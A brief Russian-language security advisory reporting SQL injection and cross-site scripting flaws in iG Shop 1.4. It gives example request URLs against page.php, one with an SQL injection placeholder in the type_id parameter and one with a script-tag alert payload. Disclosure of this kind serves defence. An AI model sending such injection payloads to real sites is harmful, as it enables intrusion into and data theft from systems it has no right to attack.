Программа: iG Shop 1.4
Уязвимость обнаружена в iG Shop. Удаленный атакующий может выполнить XSS нападение и нападение SQL инъекции.
1. SQL инъекция:
page.php?page_type=catalog_products&type_id[] ='[SQL Injection]&SESSION_ID={SESSION_ID}
&SESSION_ID=
2. XSS нападение:
page.php?page_type=catalog_products&type _id[]=%3Cscript%3Ealert(document.domain);
%3C/script%3E&SESSION_ID ={SESSION_ID}&SESSION_ID=
